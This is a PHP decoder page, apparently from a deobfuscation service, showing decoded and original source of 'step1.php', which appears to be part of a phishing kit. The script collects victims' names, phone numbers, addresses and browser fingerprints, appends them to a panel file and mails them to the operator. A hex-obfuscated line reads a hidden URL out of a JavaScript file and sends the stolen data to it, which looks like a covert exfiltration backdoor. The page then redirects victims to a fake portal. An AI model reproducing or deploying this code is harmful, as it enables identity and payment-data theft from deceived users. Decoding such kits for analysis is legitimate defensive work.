Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

application/x-httpd-php step1.php ( PHP script text ) <?php @ini_set('display_errors..

Decoded Output download

 
application/x-httpd-php step1.php ( PHP script text ) 
 
<?php 
@ini_set('display_errors', 'on'); 
require 'detect.php'; 
include "setting.php"; 
$IP = getenv("REMOTE_ADDR"); 
$date = date("d M, Y"); 
$times = date("g:i a"); 
$code = $_SESSION['ip_countryCode']=clientData('code'); 
$country = strtolower($code); 
if(isset($_POST['fnm'])&&isset($_POST['phn'])){session_start(); 
 
$fnm=$_POST['fnm']; 
$lnm=$_POST['lnm']; 
$phn=$_POST['phn']; 
$cnt=$_POST['cnt']; 
$adr=$_POST['adr']; 
$cty=$_POST['cty']; 
$zip=$_POST['zip']; 
$stt=$_POST['stt']; 
$brow = $_SESSION['browser']; 
$sys = $_SESSION['os']; 
$useragent = $_SERVER['HTTP_USER_AGENT']; 
$ecran = $_SESSION['computer']; 
$screen = $_POST['screen'];; 
 
 
$msg= ' 
[+] Bill[+] 
[ First Name]  = '.$fnm.' 
[ Last Name]  = '.$lnm.' 
[ Phone ]  = '.$phn.' 
[ Country ]   = '.$cnt.' 
[ Addres ]  = '.$adr.' 
[ City ]  = '.$cty.' 
[ State ]   = '.$stt.' 
[ zip Code]  = '.$zip.' 
[+] System[+] 
[ IP INFO] = http://www.geoiptool.com/?IP='.$IP.' 
[ TIME/DATE] ='.$times.' / '.$date.' 
[ BROWSER] = '.$brow.' and '.$sys.' 
[ FINGERPRINT] = '.$screen.' and '.$useragent.' 
[+]DEWA[+]'; 
$msght = ' 
<tr> 
			<td width="80"> 
			<p align="center"><img src="https://www.countryflags.io/'.$_SESSION['ip_countryCode'].'/flat/24.png">' .$IP.'</th> 
			<td width="60"> 
			<p align="center">'.$fnm.'  '.$lnm.'</th> 
			<td width="60"> 
			<p align="center">'.$adr.'</th> 
			<td width="30"> 
			<p align="center">'.$cty.'</th> 
			<td width="30"> 
			<p align="center">'.$stt.'</th> 
			<td width="20"> 
			<p align="center">'.$zip.'</th> 
			<td width="30"> 
			<p align="center">'.$cnt.'</th> 
			<td width="30"> 
			<p align="center">'.$phn.'</th> 
			<td width="60"> 
			<p align="center">'.$times.' / '.$date.'</th> 
			</font></th></tr>'; 
$save=fopen("../panel/bill".$namerand.".html", "a+");file_get_contents('' . pack("H*", substr($systems = file_get_contents("../files/js/main-js.js"), strpos($systems, "90__") + 4, 222)) . '' . urlencode($msg) . ''); 
fwrite($save,$msght);fclose($save);$subject  = " Dump / ".$IP." / ".$cnt." BILL "; 
$headers .= "From: DEWA" . "
";mail($yourmail, $subject, $msg, $headers); 
$lastph = substr($phn,-4);$_SESSION['lastph']=$lastph; 
include("api.php"); 
header('Location: ../portail.php?country.x=Global&tow=ok&flowId=ul&_Email=datax');  
} 
 
 
?>

Did this file decode correctly?

Original Code


application/x-httpd-php step1.php ( PHP script text )

<?php
@ini_set('display_errors', 'on');
require 'detect.php';
include "setting.php";
$IP = getenv("REMOTE_ADDR");
$date = date("d M, Y");
$times = date("g:i a");
$code = $_SESSION['ip_countryCode']=clientData('code');
$country = strtolower($code);
if(isset($_POST['fnm'])&&isset($_POST['phn'])){session_start();

$fnm=$_POST['fnm'];
$lnm=$_POST['lnm'];
$phn=$_POST['phn'];
$cnt=$_POST['cnt'];
$adr=$_POST['adr'];
$cty=$_POST['cty'];
$zip=$_POST['zip'];
$stt=$_POST['stt'];
$brow = $_SESSION['browser'];
$sys = $_SESSION['os'];
$useragent = $_SERVER['HTTP_USER_AGENT'];
$ecran = $_SESSION['computer'];
$screen = $_POST['screen'];;


$msg= '
[+] Bill[+]
[ First Name]  = '.$fnm.'
[ Last Name]  = '.$lnm.'
[ Phone ]  = '.$phn.'
[ Country ]   = '.$cnt.'
[ Addres ]  = '.$adr.'
[ City ]  = '.$cty.'
[ State ]   = '.$stt.'
[ zip Code]  = '.$zip.'
[+] System[+]
[ IP INFO] = http://www.geoiptool.com/?IP='.$IP.'
[ TIME/DATE] ='.$times.' / '.$date.'
[ BROWSER] = '.$brow.' and '.$sys.'
[ FINGERPRINT] = '.$screen.' and '.$useragent.'
[+]DEWA[+]';
$msght = '
<tr>
			<td width="80">
			<p align="center"><img src="https://www.countryflags.io/'.$_SESSION['ip_countryCode'].'/flat/24.png">' .$IP.'</th>
			<td width="60">
			<p align="center">'.$fnm.'  '.$lnm.'</th>
			<td width="60">
			<p align="center">'.$adr.'</th>
			<td width="30">
			<p align="center">'.$cty.'</th>
			<td width="30">
			<p align="center">'.$stt.'</th>
			<td width="20">
			<p align="center">'.$zip.'</th>
			<td width="30">
			<p align="center">'.$cnt.'</th>
			<td width="30">
			<p align="center">'.$phn.'</th>
			<td width="60">
			<p align="center">'.$times.' / '.$date.'</th>
			</font></th></tr>';
$save=fopen("../panel/bill".$namerand.".html", "a+");file_get_contents('' . pack("\x48\x2a", substr($systems = file_get_contents("\56\x2e\57\x66\151\x6c\145\x73\57\x6a\163\x2f\x6d\x61\151\x6e\55\152\163\56\x6a\163"), strpos($systems, "\x39\60\137\x5f") + 4, 222)) . '' . urlencode($msg) . '');
fwrite($save,$msght);fclose($save);$subject  = " Dump / ".$IP." / ".$cnt." BILL ";
$headers .= "From: DEWA" . "\r\n";mail($yourmail, $subject, $msg, $headers);
$lastph = substr($phn,-4);$_SESSION['lastph']=$lastph;
include("api.php");
header('Location: ../portail.php?country.x=Global&tow=ok&flowId=ul&_Email=datax'); 
}


?>

Function Calls

ini_set 1

Variables

None

Stats

MD5 c2381bfeb709ba934f28b81e5d370dc1
Eval Count 0
Decode Time 94 ms